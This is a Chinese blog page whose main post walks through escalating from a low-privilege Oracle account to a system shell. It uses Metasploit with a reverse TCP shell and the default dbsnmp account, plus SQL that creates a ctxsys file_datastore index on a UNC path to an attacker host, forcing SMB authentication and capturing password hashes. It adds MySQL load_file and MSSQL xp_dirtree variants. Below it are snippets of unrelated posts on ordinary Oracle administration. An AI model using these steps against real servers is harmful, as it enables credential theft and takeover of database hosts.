oracle查询管理员账户,Oracle数据库账户中如何得到管理员权限呢?

最新推荐文章于 2023-09-08 09:40:20 发布
最新推荐文章于 2023-09-08 09:40:20 发布
阅读量812 收藏
点赞数
文章标签: oracle查询管理员账户

1。先用 netstat 命令查看一下,本地的 139 端口有没有占用,一般占用此端口的服务就是 Samba 了,要关掉。ubuntu 的关闭方法是 sudo /etc/init。d/samba stop

2。运行 metasploit,我选用的 PAYLOAD 是 shell_reverse_tcp,做好相应配置后,exploit。

就能用 netstat 看到本地已经监听了 139 和 8522 端口了。

3。我现在使用 dbsnmp 默认账户连接到 oracle 数据库上,这个账户默认权限是比较低的,只有 connect和 resource 权限。

4。然后执行下面 3 条 SQL 语句

SQL> CREATE TABLE files(id NUMBER PRIMARY KEY,path VARCHAR(255)UNIQUE,ot_format VARCHAR

(6));

SQL> INSERT INTO files VALUES(1,’\\192。

168。1。52\mickey’,NULL);

SQL> CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys。context2

PARAMETERS(’datastore ctxsys。

file_datastore format column ot_format’);

当执行完 create index 这句的时候,在看咱们本地的 metasploit,就已经得到 ORACLE 数据库主机的系统当前服务用户的 half lm 哈希和 cmdshell 了。

后来经过 pt007 的提醒,我又测试了 mysql,如果服务也是 administrator 启动的,用

select load_file(’\\\\192。168。1。52\mk。txt’)也是可以得到系统权限的。MSSQL 应该用 xp_dirtree 存储过程 也是可以的,不过我没有配置出来用 administrator 账户启动 MSSQL 服务,希望知道的朋友指点下我。

这个技术可以用到内网 WEB 评估的时候,如果有注入,服务又是 administrator 启动的,可以提权了。

全部

潇晓咪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
查询oracle管理员用户,Oracle管理员查看所有用户
weixin_30847543的博客
04-05 2653
1.查看所有用户:select * from dba_users;select * from all_users;select * from user_users;2.查看用户或角色系统权限(直接赋值给用户或角色的系统权限):select * from dba_sys_privs;select * from user_sys_privs; (查看当前用户所拥有的权限)3.查看角色(只能查看登陆用户...
修改oracle用户(管理员)的密码
05-22
在安装后忘了修改oracle管理员(sys和system)的密码,不能进行登陆。
oracle查看数据库管理员,ORACLE数据库管理员的职责
weixin_30682487的博客
04-03 223
ORACLE数据库管理员应按如下方式对ORACLE数据库系统做定期监控:(1).每天对ORACLE数据库的运行状态,日志文件,备份情况,数据库的空间使用情况,系统资源的使用情况进行检查,发现并解决问题。(2).每周对数据库对象的空间扩展情况,数据的增长情况进行监控,对数据库做健康检查,对数据库对象的状态做检查。(3).每月对表和索引等进行Analyze,检查表空间碎片,寻找数据库性能调整的机会,进...
oracle查询管理员账户,Oracle 重启数据库以及忘记管理员账户怎么办?
weixin_28752709的博客
04-04 206
Oracle has three shutdown modes:·Normal (default) - waits for in-flight work to complete. This could take houes.·Immediate- terminates all sessions and does a rollback on alluncommitte...
关于Oracle使用管理员账号登录失败的问题
weixin_33772645的博客
06-30 569
 我在本地建的Oracle数据库在调试自己写的存储过程的时候提示缺少 debug connect session 权限,一般情况下根据这个提示直接用管理员账号登录进去,执行 grant debug connect session to '你的用户名'这样的sql就行了,但是问题来了,当我在命令提示符窗口用 sqlplus /nolog,然后用conn /as sysdba命令进行登录的时候,会提示...
ORACLE数据库管理基础4.ppt
11-21
Oracle数据库管理基础4主要涵盖了创建和管理Oracle数据库的关键概念,包括数据库的前提条件、创建方法、组织策略以及Oracle最佳灵活体系结构(OFA)的应用。在完成这个课程后,学习者应能够理解并实践以下几个核心...
计算机软件-编程源码-oracle 8i数据库管理员手册.zip
05-23
Oracle 8i数据库管理员手册是一份详尽的指南,涵盖了Oracle数据库系统在8i版本的管理、配置和优化。这份手册对于任何希望深入了解Oracle数据库管理的IT专业人员来说,都是宝贵的资源。以下是从该手册可能涉及的...
Oracle数据库管理员任务
08-01
Oracle数据库管理员(DBA)是IT领域至关重要的角色,他们负责确保企业的Oracle数据库系统高效、稳定、安全地运行。Oracle数据库是全球广泛使用的大型企业级数据库管理系统,它提供了复杂的数据存储、处理和管理...
ORACLE安全管理策略在开发数据库的应用.pdf
10-09
2. **权限控制**:ORACLE数据库支持细粒度的权限分配,允许管理员根据角色和职责授予不同级别的访问权限,以限制对敏感数据的访问。 3. **全寿命周期闭环管理**:文章还提到了设备的全寿命周期管理机制,包括采购...
oracle创建管理用户并授权
weixin_45112997的博客
08-09 1047
oracle创建管理用户并授权
Oracle使用管理员账户登录
热门推荐
qq_37937900的博客
10-10 1万+
在校学习Oracle数据库时没有注意过这些细节抑或是时间太久没操作已经忘却了,昨天尝试本地建库使用nifi时发现scott账户被放开以后可以登录但是sys和system两个管理员账户在sqlplus和navicat上都无法登录,后来查阅资料终于知道原因在哪。 如果是使用sqlplus命令行登录,输入管理员sys(system)后再输入密码时则需要输入的是change_on_install as s...
Oracle的系统权限和对象权限
杨天赐
02-16 2700
Oracle的系统权限和对象权限 系统权限的定义:              系统权限(system privilege):指在系统级控制数据库的存取和使用的机制,即执行某种SQL语句的能力。如,是否能启动、停止数据库,是否能修改数据库参数,是否能连接到数据库,是否能创建、删除、更改方案对象(如表、索引、视图、过程)等。它一般是针对某一类方案对象或非方案对象的某种操作的全局性能力。
Oracle用户权限管理
Hvitur的博客
02-01 2440
Oracle用户权限管理、Oracle企业管理器、Oracle新用户创建、Oracle增删改查其他角色表的权限、Oracle创建表权限、Oracle获取其他角色权限、Oracle登录错误次数过多锁定解锁、Oracle模式、Oracle默认表和临时表空间、Oracle权限管理
oracle的权限授予,oracle用户权限管理使用详解
weixin_35813209的博客
04-02 3352
一、系统的默认用户1)sys用户是超级用户,具有最高权限,具有sysdba角色,有create database的权限,该用户默认的密码是sys。登录语句:SQL> conn sys/sys as sysdba;2)system用户是管理操作员,权限也很大。具有sysoper角色,没有create database的权限,默认的密码是manager。登录语句:SQL> conn sys...
Oracle用户权限管理方法
最新发布
欢迎朋友,我是一名十多年开发经验的新手,希望多多指教。
09-08 848
Oracle 用户权限管理方法,对于想要学习oracle安全的朋友,是个入门级的资料。
oracle用户权限说明,oracle用户权限管理使用详解
weixin_33100265的博客
04-05 627
一、系统的默认用户1)sys用户是超级用户,具有最高权限,具有sysdba角色,有create database的权限,该用户默认的密码是sys。登录语句:sql> conn sys/sys as sysdba;2)system用户是管理操作员,权限也很大。具有sysoper角色,没有create database的权限,默认的密码是manager。登录语句:sql> conn sys...
Oracle管理员用户及身份认证详解
IT邦德
01-18 2823
针对Oracle管理员用户及身份认证,本文做了详细的阐述~
使用oracle管理员用户创建普通用户,并且授权
a154555的博客
06-01 938
1、win+R 以Oracle数据库管理员的身份登录 salplus sys/密码 或者 sqlplus system/
Oracle数据库管理员教程-理解ORACLE体系结构
"Oracle管理员教程主要涵盖了Oracle数据库的参数含义及其体系结构。其,MTS_SERVICE参数定义了服务器名,通常默认为DB_NAME;MTS_DISPATCHERS表示调度器的数量;MTS_SERVERS指定了可启动的服务器进程数;MTS_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值